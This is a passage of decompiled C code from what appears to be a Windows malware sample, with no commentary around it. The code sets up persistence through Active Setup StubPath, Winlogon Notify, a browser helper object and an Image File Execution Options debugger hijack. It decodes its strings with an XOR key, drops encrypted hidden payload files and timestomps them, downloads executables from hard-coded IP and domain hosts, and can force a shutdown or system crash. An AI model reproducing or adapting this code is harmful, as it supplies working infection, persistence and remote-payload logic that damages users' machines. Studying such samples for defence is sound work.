																														if(_t1254[0xa] != 0) {
																															_t1127 =  &(_t1254[0x3cb]);
																															SetFileAttributesA(_t1127, 0x21);
																															_t696 = RegCreateKeyA(0x80000002,  &(_t1254[0x40f]),  &(_t1254[0x26]));
																															__eflags = _t696;
																															if(_t696 == 0) {
																																E00401251(_t1254[0x26]);
																																_t1254[0x27] = 1;
																																_t700 = RegSetValueExA(_t1254[0x2b], "IsInstalled", 0, 4,  &(_t1254[0x28]), 4);
																																_push(_t1127);
																																L00405E40();
																																_t701 = _t700 + 1;
																																__eflags = _t701;
																																RegSetValueExA(_t1254[0x2b], "StubPath", 0, 1, _t1127, _t701);
																																RegCloseKey(_t1254[0x26]);
																															}
																														}
																														__eflags = _t1254[0xb];
																														_t1226 =  &(_t1254[0x26]);
																														if(_t1254[0xb] == 0) {
																															_t663 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t1226);
																															__eflags = _t663;
																															if(_t663 == 0) {
																																L663:
																																_t1124 =  &(_t1254[0x55a]);
																																_push(_t1124);
																																L00405E40();
																																_t664 = _t663 + 1;
																																__eflags = _t664;
																																_push(_t664);
																																_push(_t1124);
																																_push(1);
																																_push(0);
																																_push( *0x4120b0);
																																L664:
																																RegSetValueExA(_t1254[0x2b], ??, ??, ??, ??, ??);
																																RegCloseKey(_t1254[0x26]);
																																L665:
																																__eflags = _t1254[9];
																																if(_t1254[9] == 0) {
																																	goto L675;
																																}
																																_t1125 =  &(_t1254[0x27]);
																																_t671 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t1125, 0);
																																__eflags = _t671;
																																if(_t671 == 0) {
																																	L668:
																																	RegSetValueExA(_t1254[0x2b], "SubshellState", 0, 3,  &(_t1254[0x1ef]), 0x22a);
																																	RegCloseKey(_t1254[0x26]);
																																	L669:
																																	_t1126 =  &(_t1254[0x387]);
																																	SetFileAttributesA(_t1126, 0x21);
																																	__eflags =  *0x412100 - 2;
																																	_t1229 =  &(_t1254[0x26]);
																																	if( *0x412100 != 2) {
																																		_t676 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t1229);
																																		__eflags = _t676;
																																		if(_t676 != 0) {
																																			goto L675;
																																		}
																																		_push(_t1126);
																																		L00405E40();
																																		RegSetValueExA(_t1254[0x2b], 0, 0, 1, _t1126, _t676 + 1);
																																		RegSetValueExA(_t1254[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																																		RegCloseKey(_t1254[0x26]);
																																		_t681 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t1229);
																																		__eflags = _t681;
																																		if(_t681 != 0) {
																																			goto L675;
																																		}
																																		L674:
																																		RegCloseKey(_t1254[0x26]);
																																		goto L675;
																																	}
																																	_t683 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t1229);
																																	__eflags = _t683;
																																	if(_t683 != 0) {
																																		goto L675;
																																	}
																																	_t685 = E00401251(_t1254[0x26]);
																																	_push(_t1126);
																																	L00405E40();
																																	RegSetValueExA(_t1254[0x2b], "DLLName", 0, 1, _t1126, _t685 + 1);
																																	RegSetValueExA(_t1254[0x2b], "Startup", 0, 1, "Startup", 8);
																																	goto L674;
																																}
																																_t689 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t1125, 0);
																																__eflags = _t689;
																																if(_t689 != 0) {
																																	goto L669;
																																}
																																goto L668;
																															}
																															_t663 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t1226);
																															__eflags = _t663;
																															if(_t663 != 0) {
																																goto L665;
																															}
																															goto L663;
																														}
																														_t1128 =  &(_t1254[0x48f]);
																														SetFileAttributesA(_t1128, 0x21);
																														_t670 = RegCreateKeyA(0x80000002, 0x408720, _t1226);
																														__eflags = _t670;
																														if(_t670 != 0) {
																															goto L665;
																														}
																														_t691 = E00401251(_t1254[0x26]);
																														_push(_t1128);
																														L00405E40();
																														_push(_t691 + 1);
																														_push(_t1128);
																														_push(1);
																														_push(0);
																														_push("Debugger");
																														goto L664;
																														L675:
																														SetFileAttributesA( &(_t1254[0x55b]), 0x21);
																														Sleep(0x3e8);
																														_t454 =  &(_t1254[0xd]);
																														 *_t454 = _t1254[0xd] - 1;
																														__eflags =  *_t454;
																													} while ( *_t454 >= 0);
																													L676:
																													_t707 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t1254[0x12]), 0);
																													__eflags = _t707;
																													if(_t707 != 0) {
																														do {
																															E004011CF(0x80000002, 0x407000);
																															__eflags = _t1254[0xc] - 9;
																															if(_t1254[0xc] <= 9) {
																																goto L651;
																															}
																															goto L617;
																														} while (_t707 != 0);
																													}
																													_t1254[0x10] = 4;
																													_t1132 =  &(_t1254[0x10]);
																													_t709 = RegQueryValueExA(_t1254[0x16], "g00d d0gg", 0, 0, _t1132,  &(_t1254[0x10]));
																													__eflags = _t709;
																													if(_t709 == 0) {
																														_t712 = _t1254[0xf] - 1;
																														__eflags = _t712;
																														_t1254[0xf] = _t712;
																														if(_t712 == 0) {
																															RegDeleteValueA(_t1254[0x12], "g00d d0gg");
																															Sleep(0x1388);
																															__eflags =  *0x412100 - 2;
																															if( *0x412100 != 2) {
																																ExitWindowsEx(6, 0);
																															} else {
																																RtlAdjustPrivilege(0x13, 1, 0,  &(_t1254[0xe]));
																																 *0x412240(1);
																															}
																														} else {
																															RegSetValueExA(_t1254[0x16], "g00d d0gg", 0, 4, _t1132, 4);
																														}
																													}
																													RegCloseKey(_t1254[0x11]);
																													continue;
																												}
																												_t721 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t1254[0x1c]), 0);
																												__eflags = _t721;
																												if(_t721 != 0) {
																													__eflags =  *_t1254;
																													if( *_t1254 == 0) {
																														goto L652;
																													}
																													L650:
																													_t1254[0xc] = 0;
																													goto L652;
																												}
																												_t1251 =  &(_t1254[0x19]);
																												GetSystemTimeAsFileTime(_t1251);
																												_t1254[0x18] = 8;
																												_t1217 =  &(_t1254[0x17]);
																												_t723 = RegQueryValueExA(_t1254[0x20], "ConnPred", 0,  &(_t1254[0x17]), _t1217,  &(_t1254[0x18]));
																												__eflags = _t723;
																												if(_t723 != 0) {
																													L621:
																													__eflags = E004014D8(_t1251, 0x412070) - 0x4af;
																													if(__eflags <= 0) {
																														L632:
																														__eflags =  *0x412080;
																														if( *0x412080 == 0) {
																															L635:
																															_t1254[0x18] = 8;
																															__eflags = RegQueryValueExA(_t1254[0x20], "UseExtProfile", 0,  &(_t1254[0x17]), _t1217,  &(_t1254[0x18]));
																															if(__eflags != 0) {
																																L637:
																																_t728 = E00402427(__eflags);
																																__eflags = _t728;
																																if(_t728 != 0) {
																																	L647:
																																	RegCloseKey(_t1254[0x1b]);
																																	goto L648;
																																}
																																_push(1);
																																_push(0);
																																_t731 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																																__eflags = _t731;
																																if(_t731 == 0) {
																																	L640:
																																	_t1254[0x18] = 8;
																																	_t1130 =  &(_t1254[0x13]);
																																	_t733 = RegQueryValueExA(_t1254[0x20], "UseDflProfile", 0,  &(_t1254[0x17]),  &(_t1254[0x13]),  &(_t1254[0x18]));
																																	__eflags = _t733;
																																	if(_t733 != 0) {
																																		_t742 = _t1254[0x16] + 0x1162f100;
																																		__eflags = _t742;
																																		asm("adc edx, 0xffffff9b");
																																		_t1254[0x12] = _t742;
																																		_t1254[0x13] = _t1254[0x17];
																																	}
																																	__eflags = E004014D8( &(_t1254[0x19]), _t1130) - 0x152ab;
																																	if(__eflags <= 0) {
																																		goto L647;
																																	}
																																	_t736 = E00402427(__eflags);
																																	__eflags = _t736;
																																	if(_t736 != 0) {
																																		goto L647;
																																	}
																																	_push(3);
																																	_push(0);
																																	_t738 = E0040211B("tombul.gif", 0);
																																	__eflags = _t738;
																																	if(_t738 == 0) {
																																		goto L647;
																																	}
																																	_push(8);
																																	_push(_t1251);
																																	_push(0xb);
																																	_push(0);
																																	_push("UseDflProfile");
																																	L646:
																																	RegSetValueExA(_t1254[0x20], ??, ??, ??, ??, ??);
																																	RegCloseKey(_t1254[0x1b]);
																																	 *_t1254 = 1;
																																	goto L650;
																																}
																																_t1254[0x16] = _t1254[0x19].dwLowDateTime;
																																_t1254[0x17] = _t1254[0x1a];
																																_push(8);
																																_push(_t1251);
																																_push(0xb);
																																_push(0);
																																_push("UseExtProfile");
																																goto L646;
																															}
																															__eflags = E004014D8( &(_t1254[0x19]),  &(_t1254[0x16])) - 0x152ab;
																															if(__eflags <= 0) {
																																goto L640;
																															}
																															goto L637;
																														}
																														_push(3);
																														_push(0);
																														_t747 = E0040211B("grazie.gif", 0);
																														__eflags = _t747;
																														if(_t747 == 0) {
																															goto L635;
																														}
																														_t1254[0x16] = _t1254[0x19].dwLowDateTime;
																														_t1254[0x17] = _t1254[0x1a];
																														_push(8);
																														_push(_t1251);
																														_push(0xb);
																														_push(0);
																														_push("ConnPred");
																														goto L646;
																													}
																													_t749 = E00402427(__eflags);
																													__eflags = _t749;
																													if(_t749 != 0) {
																														goto L647;
																													}
																													_t751 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																													_t1228 = 0;
																													__eflags = _t751;
																													_t1131 = _t751;
																													if(_t751 != 0) {
																														_t756 = E00401E00(_t751,  &(_t1254[0x15]), 2);
																														__eflags = _t756 - 2;
																														if(_t756 == 2) {
																															_t1228 = 1;
																														}
																													}
																													E00401F59(_t1131);
																													__eflags = _t1228;
																													if(_t1228 == 0) {
																														 *0x412080 = 0;
																														goto L632;
																													}
																													 *0x412070 = _t1254[0x19];
																													_t755 = 0;
																													__eflags = _t1254[0x14] - 0x49;
																													 *0x412074 = _t1254[0x1a];
																													if(_t1254[0x14] == 0x49) {
																														__eflags = _t1254[0x14] - 0x54;
																														if(_t1254[0x14] == 0x54) {
																															_t755 = 1;
																														}
																													}
																													 *0x412080 = _t755;
																													goto L632;
																												}
																												_t758 = E004014D8(_t1251, _t1217);
																												__eflags = _t758 - 0x152ab;
																												if(_t758 <= 0x152ab) {
																													goto L635;
																												}
																												goto L621;
																												L651:
																												_t417 =  &(_t1254[0xc]);
																												 *_t417 = _t1254[0xc] + 1;
																												__eflags =  *_t417;
																												goto L652;
																											}
																										}
																										_t759 = 0x4071e0;
																										while(1) {
																											__eflags = _t759 - 0x407214;
																											if(_t759 >= 0x407214) {
																												break;
																											}
																											 *_t759 =  *_t759 ^ 0x000000d4;
																											_t759 =  &(_t759[1]);
																										}
																										_t760 = 0x4071c3;
																										while(1) {
																											__eflags = _t760 - 0x4071cf;
																											if(_t760 >= 0x4071cf) {
																												break;
																											}
																											 *_t760 =  *_t760 ^ 0x000000d4;
																											_t760 =  &(_t760[1]);
																										}
																										_t1230 =  &(_t1254[0x26]);
																										_t761 = RegCreateKeyA(0x80000002, 0x4071e0, _t1230);
																										__eflags = _t761;
																										if(_t761 == 0) {
																											RegSetValueExA(_t1254[0x2b], 0x4071c3, 0, 4,  &(_t1254[0x28]), 4);
																											RegCloseKey(_t1254[0x26]);
																										}
																										_t762 = 0x4071a0;
																										while(1) {
																											__eflags = _t762 - 0x4071c2;
																											if(_t762 >= 0x4071c2) {
																												break;
																											}
																											 *_t762 =  *_t762 ^ 0x000000d4;
																											_t762 =  &(_t762[1]);
																										}
																										_t763 = 0x407177;
																										while(1) {
																											__eflags = _t763 - 0x407188;
																											if(_t763 >= 0x407188) {
																												break;
																											}
																											 *_t763 =  *_t763 ^ 0x000000d4;
																											_t763 =  &(_t763[1]);
																										}
																										_t764 = 0x407160;
																										while(1) {
																											__eflags = _t764 - 0x407176;
																											if(_t764 >= 0x407176) {
																												break;
																											}
																											 *_t764 =  *_t764 ^ 0x000000d4;
																											_t764 =  &(_t764[1]);
																										}
																										_t765 = 0x40714a;
																										while(1) {
																											__eflags = _t765 - 0x40715f;
																											if(_t765 >= 0x40715f) {
																												break;
																											}
																											 *_t765 =  *_t765 ^ 0x000000d4;
																											_t765 =  &(_t765[1]);
																										}
																										_t766 = 0x407135;
																										while(1) {
																											__eflags = _t766 - 0x407149;
																											if(_t766 >= 0x407149) {
																												break;
																											}
																											 *_t766 =  *_t766 ^ 0x000000d4;
																											_t766 =  &(_t766[1]);
																										}
																										_t767 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t1230);
																										__eflags = _t767;
																										if(_t767 == 0) {
																											_t1135 =  &(_t1254[0x28]);
																											RegSetValueExA(_t1254[0x2b], 0x407177, 0, 4, _t1135, 4);
																											RegSetValueExA(_t1254[0x2b], 0x407160, 0, 4, _t1135, 4);
																											RegSetValueExA(_t1254[0x2b], 0x40714a, 0, 4, _t1135, 4);
																											RegSetValueExA(_t1254[0x2b], 0x407135, 0, 4, _t1135, 4);
																											RegCloseKey(_t1254[0x26]);
																										}
																										_t768 = 0x4070c0;
																										while(1) {
																											__eflags = _t768 - 0x407134;
																											if(_t768 >= 0x407134) {
																												break;
																											}
																											 *_t768 =  *_t768 ^ 0x000000d4;
																											_t768 =  &(_t768[1]);
																										}
																										_t769 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t1230);
																										__eflags = _t769;
																										if(_t769 != 0) {
																											goto L612;
																										}
																										_t771 = E00401000(0x8000);
																										_t1254[0x1d] = 0x4000;
																										_t1231 = _t771;
																										_t772 = 0x407080;
																										_t1254[0x27] = 0x4000;
																										while(1) {
																											__eflags = _t772 - 0x4070a4;
																											if(_t772 >= 0x4070a4) {
																												break;
																											}
																											 *_t772 =  *_t772 ^ 0x000000d4;
																											_t772 =  &(_t772[1]);
																										}
																										_t1254[0xd] = 0;
																										while(1) {
																											_t364 =  &(_t1231[0x4000]); // 0x4000
																											_t1133 = _t364;
																											_t776 = RegEnumValueA(_t1254[0x2d], _t1254[0x13], _t1231,  &(_t1254[0x2b]), 0,  &(_t1254[0x1e]), _t364,  &(_t1254[0x1d]));
																											__eflags = _t776;
																											if(_t776 != 0) {
																												break;
																											}
																											__eflags = _t1254[0x1c] - 1;
																											if(_t1254[0x1c] == 1) {
																												_t778 = E00401311(_t1133, 0x40708d);
																												__eflags = _t778;
																												if(_t778 != 0) {
																													RegDeleteValueA(_t1254[0x27], _t1231);
																												}
																											}
																											_t359 =  &(_t1254[0xd]);
																											 *_t359 = _t1254[0xd] + 1;
																											__eflags =  *_t359;
																											_t1254[0x1d] = 0x4000;
																											_t1254[0x27] = 0x4000;
																										}
																										_t1134 =  &(_t1254[0x55a]);
																										_t781 = wsprintfA(_t1231, 0x407080, _t1134) + 1;
																										__eflags = _t781;
																										_t1254 =  &(_t1254[3]);
																										RegSetValueExA(_t1254[0x2b], _t1134, 0, 1, _t1231, _t781);
																										E00401029(_t1231);
																										RegCloseKey(_t1254[0x26]);
																										goto L612;
																									}
																									_t799 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &(_t1254[0x26]));
																									__eflags = _t799;
																									if(_t799 != 0) {
																										goto L572;
																									}
																									goto L569;
																								}
																								__eflags = _t644 - 0xffffffff;
																								if(_t644 == 0xffffffff) {
																									goto L561;
																								}
																								L560:
																								WriteFile(_t1179, 0x408840, 0x5e00,  &(_t1254[0x28]), 0);
																								CloseHandle(_t1254[0x28]);
																								goto L562;
																							}
																							__eflags = _t641 - 0xffffffff;
																							if(_t641 != 0xffffffff) {
																								goto L560;
																							}
																							goto L558;
																						}
																						__eflags = _t807 + 1;
																						if(_t807 + 1 != 0) {
																							L541:
																							WriteFile(_t1254[0x2c], 0x40e640, 0x1400,  &(_t1254[0x28]), 0);
																							__eflags = _t1254[3];
																							if(_t1254[3] != 0) {
																								SetFileTime(_t1254[0x2b],  &(_t1254[0x21]),  &(_t1254[0x22]),  &(_t1254[0x23]));
																							}
																							CloseHandle(_t1254[0x28]);
																							_t1254[9] = 1;
																							_push(0);
																							_push("winlogon.exe");
																							_t1137 =  &(_t1254[0x388]);
																							_t813 = E0040318D(_t1137);
																							_t1254 =  &(_t1254[3]);
																							__eflags = _t813;
																							if(_t813 == 0) {
																								_push(0);
																								_push("explorer.exe");
																								E0040318D(_t1137);
																								_t1254 =  &(_t1254[3]);
																							}
																							_push(0);
																							_push("kernel32.dll");
																							_push(_t1137);
																							L555:
																							E0040318D();
																							_t1254 =  &(_t1254[3]);
																							CreateFileA( &(_t1254[0x38c]), 0x80000000, 1, 0, 3, 0, 0);
																							goto L556;
																						}
																						goto L553;
																					}
																					__eflags = _t633 + 1;
																					if(_t633 + 1 != 0) {
																						goto L541;
																					}
																					goto L550;
																				}
																				L547:
																				_t1254[9] = 1;
																				_push(0);
																				_push("kernel32.dll");
																				_push( &(_t1254[0x388]));
																				goto L555;
																			}
																			__eflags = _t629 + 1;
																			if(_t629 + 1 == 0) {
																				goto L546;
																			}
																			goto L541;
																		}
																		_t1232 =  &(_t1254[0x16a]);
																		_t821 = GetTempFileNameA(_t1118, "tmp", 0, _t1232);
																		__eflags = _t821;
																		if(_t821 == 0) {
																			goto L539;
																		}
																		_t822 = CreateFileA(_t1232, 0x40000000, 0, 0, 2, 0x80, 0);
																		_t1254[0x28] = _t822;
																		__eflags = _t822;
																		if(_t822 == 0) {
																			goto L539;
																		}
																		__eflags = _t822 + 1;
																		if(_t822 + 1 == 0) {
																			goto L539;
																		}
																		L536:
																		WriteFile(_t1254[0x2c], _t1254[8], _t1250,  &(_t1254[0x28]), 0);
																		CloseHandle(_t1254[0x28]);
																		CreateFileA( &(_t1254[0x170]), 0x80000000, 1, 0, 3, 0, 0);
																		_t1233 =  &(_t1254[0x1ee]);
																		_t1203 =  &(_t1254[0x162]);
																		_t1167 =  &(_t1254[0x278]);
																		while(1) {
																			__eflags = _t1233 - _t1167;
																			if(_t1233 >= _t1167) {
																				goto L539;
																			}
																			_t830 = _t1254[0x1ee] & 0x000000ff ^  *_t1203;
																			_t1203 =  &(_t1203[0]);
																			 *_t1233 = _t830;
																			_t1233 =  &(_t1233[1]);
																		}
																		goto L539;
																	}
																	_t1234 =  &(_t1254[0x16a]);
																	_push(_t1234);
																	_push(0);
																	_push(0x411040);
																	_push(_t1117);
																	L00405E90();
																	__eflags = _t623;
																	if(_t623 == 0) {
																		goto L531;
																	}
																	_push(0);
																	_push(0x80);
																	_push(2);
																	_push(0);
																	_push(0);
																	_push(0x40000000);
																	_push(_t1234);
																	L00405DB0();
																	_t1254[0x28] = _t623;
																	__eflags = _t623;
																	if(_t623 == 0) {
																		goto L531;
																	}
																	__eflags = _t623 + 1;
																	if(_t623 + 1 != 0) {
																		goto L536;
																	}
																	goto L531;
																}
																RegDeleteValueA(_t616, "SubshellState");
																RegCloseKey(_t1254[0x26]);
																_t1235 =  &(_t1254[0x1ee]);
																_t1204 =  &(_t1254[0x162]);
																_t1168 =  &(_t1254[0x278]);
																while(1) {
																	__eflags = _t1235 - _t1168;
																	if(_t1235 >= _t1168) {
																		break;
																	}
																	_t857 = _t1254[0x1ee] & 0x000000ff ^  *_t1235;
																	_t1235 =  &(_t1235[0]);
																	 *_t1204 = _t857;
																	_t1204 =  &(_t1204[1]);
																}
																_push( *0x4120b0);
																_t836 =  &(_t1254[0x163]);
																_push(_t836);
																L00405E50();
																__eflags = _t836;
																if(_t836 != 0) {
																	L506:
																	_t1138 =  &(_t1254[0x16b]);
																	SetFileAttributesA(_t1138, 0x80);
																	DeleteFileA(_t1138);
																	goto L520;
																}
																_push( &(_t1254[0x55a]));
																_t840 =  &(_t1254[0x1ac]);
																_push(_t840);
																L00405E50();
																__eflags = _t840;
																if(_t840 == 0) {
																	_t842 = CreateFileA( &(_t1254[0x170]), 0x80000000, 1, 0, 3, 0, 0);
																	_t1254[0x28] = _t842;
																	__eflags = _t842;
																	if(_t842 == 0) {
																		goto L506;
																	}
																	__eflags = _t842 - 0xffffffff;
																	if(_t842 == 0xffffffff) {
																		goto L506;
																	}
																	_t843 = GetFileSize(_t842, 0);
																	_t1254[0x1d] = _t843;
																	__eflags = _t843 - _t1250;
																	if(_t843 == _t1250) {
																		_t846 = E00401000(_t1250);
																		_t1236 = _t846;
																		ReadFile(_t1254[0x2c], _t846, _t1250,  &(_t1254[0x28]), 0);
																		_t1139 = _t1254[0x1d];
																		_t1205 = _t1236;
																		_t1218 = _t1254[5];
																		__eflags = _t1236 - _t1236 + _t1139;
																		while(__eflags < 0) {
																			_t1169 =  *_t1205 & 0x000000ff;
																			__eflags = _t1254[0x162] - ( *_t1218 & 0x000000ff);
																			if(__eflags == 0) {
																				__eflags = _t1169;
																			}
																			if(__eflags == 0) {
																				_t1205 =  &(_t1205[1]);
																				_t1218 =  &(_t1218[1]);
																				__eflags = _t1205 - _t1236 + _t1139;
																				continue;
																			}
																			E00401029(_t1236);
																			goto L510;
																		}
																		E00401029(_t1236);
																		goto L539;
																	}
																	L510:
																	CloseHandle(_t1254[0x28]);
																}
																goto L506;
															}
															_t1140 =  &(_t1254[0x3cb]);
															_t858 = GetSystemDirectoryA(_t1140, 0x104);
															_push( *0x412090);
															_push(0x41103e);
															_push(_t1140);
															L00405E30();
															_push(_t858);
															L00405E30();
															_t859 = 0x407260;
															while(1) {
																__eflags = _t859 - 0x407286;
																if(_t859 >= 0x407286) {
																	break;
																}
																 *_t859 =  *_t859 ^ 0x000000d4;
																_t859 =  &(_t859[1]);
															}
															_t860 = CreateMutexA(0, 0, "h`r@");
															_t1254[0x28] = _t860;
															__eflags = _t860;
															if(_t860 == 0) {
																Sleep(0x7d0);
															} else {
																WaitForSingleObject(_t860, 0x2710);
																CloseHandle(_t1254[0x28]);
															}
															_t1141 =  &(_t1254[0x3cb]);
															SetFileAttributesA(_t1141, 0x80);
															_t862 = CreateFileA(_t1141, 0x40000000, 0, 0, 2, 0x80, 0);
															_t1254[0x28] = _t862;
															__eflags = _t862;
															if(_t862 == 0) {
																L499:
																RegCloseKey(_t1254[0x26]);
																RegDeleteKeyA(0x80000001,  &(_t1254[0x40e]));
																goto L500;
															}
															__eflags = _t862 - 0xffffffff;
															if(_t862 == 0xffffffff) {
																goto L499;
															}
															WriteFile(_t862, 0x4072a0, 0x800,  &(_t1254[0x28]), 0);
															_t867 = E004010B2();
															_t1254[6] = _t867;
															__eflags = _t867;
															if(_t867 == 0) {
																_t1254[6] = 0xc6;
															}
															_t869 = E00401000(_t1250 + 0x64);
															 *((char*)(_t869 + _t1250)) = 0;
															_t1219 = _t869;
															_t1237 = _t869;
															_t1207 = _t1254[5];
															_t870 = _t869 + _t1250;
															while(1) {
																__eflags = _t1237 - _t870;
																if(_t1237 >= _t870) {
																	break;
																}
																_t895 = _t1254[6] & 0x000000ff ^  *_t1207;
																_t1207 =  &(_t1207[0]);
																 *_t1237 = _t895;
																_t1237 = _t1237 + 1;
																_t870 = _t1219 + _t1250;
															}
															_t871 =  &(_t1254[0x55a]);
															_t1142 = _t1219 + _t1250;
															_push(_t871);
															L00405E40();
															_t1238 = _t1142 +  &(_t871[1]);
															__eflags = _t1238 - _t1142 + 0x64;
															while(__eflags < 0) {
																 *_t1238 = E004010B2();
																_t1238 = _t1238 + 1;
																_t233 = _t1250 + 0x64; // 0x64
																__eflags = _t1238 - _t1219 + _t233;
															}
															 *(_t1219 + _t1250 + 1) = _t1250;
															_t1144 = _t1219 + _t1250;
															_push( &(_t1254[0x55a]));
															_t1239 = _t1144;
															_push( &(_t1144[1]));
															L00405E20();
															_t874 =  &(_t1144[0x19]);
															while(1) {
																__eflags = _t1239 - _t874;
																if(_t1239 >= _t874) {
																	break;
																}
																 *_t1239 =  *_t1239 ^ _t1254[6] & 0x000000ff;
																_t1239 =  &(_t1239[0]);
																_t242 = _t1250 + 0x64; // 0x64
																_t874 = _t1219 + _t242;
															}
															WriteFile(_t1254[0x2c], _t1219, _t1250 + 0x64,  &(_t1254[0x28]), 0);
															E00401029(_t1219);
															__eflags = _t1254[3];
															if(_t1254[3] != 0) {
																SetFileTime(_t1254[0x2b],  &(_t1254[0x21]),  &(_t1254[0x22]),  &(_t1254[0x23]));
															}
															CloseHandle(_t1254[0x28]);
															_t1145 =  &(_t1254[0x3d0]);
															CreateFileA(_t1145, 0x80000000, 1, 0, 3, 0, 0);
															E00401251(_t1254[0x26]);
															_t1254[0x27] = 1;
															_t884 = RegSetValueExA(_t1254[0x2b], "IsInstalled", 0, 4,  &(_t1254[0x28]), 4);
															_push(_t1145);
															L00405E40();
															_t885 = _t884 + 1;
															__eflags = _t885;
															RegSetValueExA(_t1254[0x2b], "StubPath", 0, 1, _t1145, _t885);
															_t1254[0xa] = 1;
															goto L499;
														}
														__eflags =  *((char*)(_t1253 + 0x1e8));
														if( *((char*)(_t1253 + 0x1e8)) != 0) {
															_push(_t1115);
															_t898 = _t1253 + 0x1bc;
															_push(_t898);
															L00405E20();
															while(1) {
																_t1146 = _t1253 + 0x1b8;
																_push(_t1146);
																L00405E40();
																__eflags = _t898 - 0xf;
																if(_t898 > 0xf) {
																	goto L469;
																}
																_t898 = _t1253 + 0x1e8;
																_push(_t898);
																_push(_t1146);
																L00405E30();
															}
															goto L469;
														}
														goto L465;
													}
													_t900 = RegCreateKeyA(0x80000002, 0x408720, _t1253 + 0x98);
													__eflags = _t900;
													if(_t900 != 0) {
														goto L463;
													}
													_t1147 = _t1253 + 0x123c;
													_t901 = GetSystemDirectoryA(_t1147, 0x104);
													_push( *0x4120a0);
													_push(0x41103e);
													_push(_t1147);
													L00405E30();
													_push(_t901);
													L00405E30();
													_t902 = 0x407ae0;
													while(1) {
														__eflags = _t902 - 0x407b06;
														if(_t902 >= 0x407b06) {
															break;
														}
														 *_t902 =  *_t902 ^ 0x000000d4;
														_t902 =  &(_t902[1]);
													}
													_t903 = CreateMutexA(0, 0, 0x407ae0);
													 *(_t1253 + 0xa0) = _t903;
													__eflags = _t903;
													if(_t903 == 0) {
														Sleep(0x7d0);
													} else {
														WaitForSingleObject(_t903, 0x2710);
														CloseHandle( *(_t1253 + 0xa0));
													}
													_t1148 = _t1253 + 0x123c;
													SetFileAttributesA(_t1148, 0x80);
													_t905 = CreateFileA(_t1148, 0x40000000, 0, 0, 2, 0x80, 0);
													 *(_t1253 + 0xa0) = _t905;
													__eflags = _t905;
													if(_t905 == 0) {
														L462:
														RegCloseKey( *(_t1253 + 0x98));
														goto L463;
													}
													__eflags = _t905 - 0xffffffff;
													if(_t905 == 0xffffffff) {
														goto L462;
													}
													WriteFile(_t905, 0x407b20, 0xc00, _t1253 + 0xa0, 0);
													_t908 = E004010B2();
													 *(_t1253 + 0x1b) = _t908;
													__eflags = _t908;
													if(_t908 == 0) {
														 *(_t1253 + 0x1b) = 0x66;
													}
													_t910 = E00401000(_t1250 + 0x64);
													 *((char*)(_t910 + _t1250)) = 0;
													_t1220 = _t910;
													_t1240 = _t910;
													_t1210 =  *(_t1253 + 0x14);
													_t911 = _t910 + _t1250;
													while(1) {
														__eflags = _t1240 - _t911;
														if(_t1240 >= _t911) {
															break;
														}
														_t935 =  *(_t1253 + 0x1b) & 0x000000ff ^  *_t1210;
														_t1210 =  &(_t1210[0]);
														 *_t1240 = _t935;
														_t1240 = _t1240 + 1;
														_t911 = _t1220 + _t1250;
													}
													_t912 = _t1253 + 0x1568;
													_t1149 = _t1220 + _t1250;
													_push(_t912);
													L00405E40();
													_t1241 = _t1149 + _t912 + 5;
													__eflags = _t1241 - _t1149 + 0x64;
													while(__eflags < 0) {
														 *_t1241 = E004010B2();
														_t1241 = _t1241 + 1;
														_t161 = _t1250 + 0x64; // 0x64
														__eflags = _t1241 - _t1220 + _t161;
													}
													 *(_t1220 + _t1250 + 1) = _t1250;
													_t1151 = _t1220 + _t1250;
													_push(_t1253 + 0x1568);
													_t1242 = _t1151;
													_push( &(_t1151[1]));
													L00405E20();
													_t915 =  &(_t1151[0x19]);
													while(1) {
														__eflags = _t1242 - _t915;
														if(_t1242 >= _t915) {
															break;
														}
														 *_t1242 =  *_t1242 ^  *(_t1253 + 0x1b) & 0x000000ff;
														_t1242 =  &(_t1242[0]);
														_t170 = _t1250 + 0x64; // 0x64
														_t915 = _t1220 + _t170;
													}
													WriteFile( *(_t1253 + 0xb0), _t1220, _t1250 + 0x64, _t1253 + 0xa0, 0);
													E00401029(_t1220);
													__eflags =  *(_t1253 + 0xc);
													if( *(_t1253 + 0xc) != 0) {
														SetFileTime( *(_t1253 + 0xac), _t1253 + 0x84, _t1253 + 0x88, _t1253 + 0x8c);
													}
													CloseHandle( *(_t1253 + 0xa0));
													_t1152 = _t1253 + 0x1250;
													CreateFileA(_t1152, 0x80000000, 1, 0, 3, 0, 0);
													RegDeleteValueA( *(_t1253 + 0x9c), "Debugger");
													_t924 = E00401251( *(_t1253 + 0x98));
													_push(_t1152);
													L00405E40();
													_t925 = _t924 + 1;
													__eflags = _t925;
													RegSetValueExA( *(_t1253 + 0xac), "Debugger", 0, 1, _t1152, _t925);
													 *(_t1253 + 0x2c) = 1;
													goto L462;
												}
												__eflags = _t584 - 0xffffffff;
												if(_t584 == 0xffffffff) {
													goto L430;
												}
												_t1250 = GetFileSize(_t584, 0);
												 *(_t1253 + 0x14) = E00401000(_t938);
